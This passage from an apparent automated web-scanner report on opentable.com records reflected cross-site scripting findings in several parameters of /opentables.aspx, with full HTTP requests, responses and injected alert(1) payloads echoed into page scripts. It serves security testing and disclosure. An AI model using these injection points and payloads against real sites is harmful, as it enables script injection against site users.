Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=29&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=6&vbefreg=6&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=29&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=29&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46196


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
'7:00 PM';
ResultProperties.Request.PartySize = 2;
ResultProperties.Request.Action = '';
ResultProperties.Request.DateTime = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Request.SearchType = 'singlec312e';alert(1)//0cc46fdb0ea';
ResultProperties.Request.SearchDate = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Response.ResultsType = 5;
ResultProperties.Response.IsWhiteLabelRestRefSearch = true;
ResultProperties.Response.
...[SNIP]...

4.63. http://www.opentable.com/opentables.aspx [d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a79b6'%3balert(1)//ef617dd9c1 was submitted in the d parameter. This input was echoed as a79b6';alert(1)//ef617dd9c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PMa79b6'%3balert(1)//ef617dd9c1&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a58&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=37&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41817


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
alDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PMa79b6';alert(1)//ef617dd9c1&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
ResultProperties.InResult
...[SNIP]...

4.64. http://www.opentable.com/opentables.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e873'%3balert(1)//c9d78f9b326 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e873';alert(1)//c9d78f9b326 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod&8e873'%3balert(1)//c9d78f9b326=1 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:05 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a05&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod%268e873'%253balert(1)%252f%252fc9d78f9b326%3d1&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=49&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=12&vbefreg=12&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=49&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=49&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46366


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&8e873';alert(1)//c9d78f9b326=1&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new
...[SNIP]...

4.65. http://www.opentable.com/opentables.aspx [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8520'%3balert(1)//d273cd86d21 was submitted in the p parameter. This input was echoed as e8520';alert(1)//d273cd86d21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2e8520'%3balert(1)//d273cd86d21&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a57&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=39&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=39&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=39&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
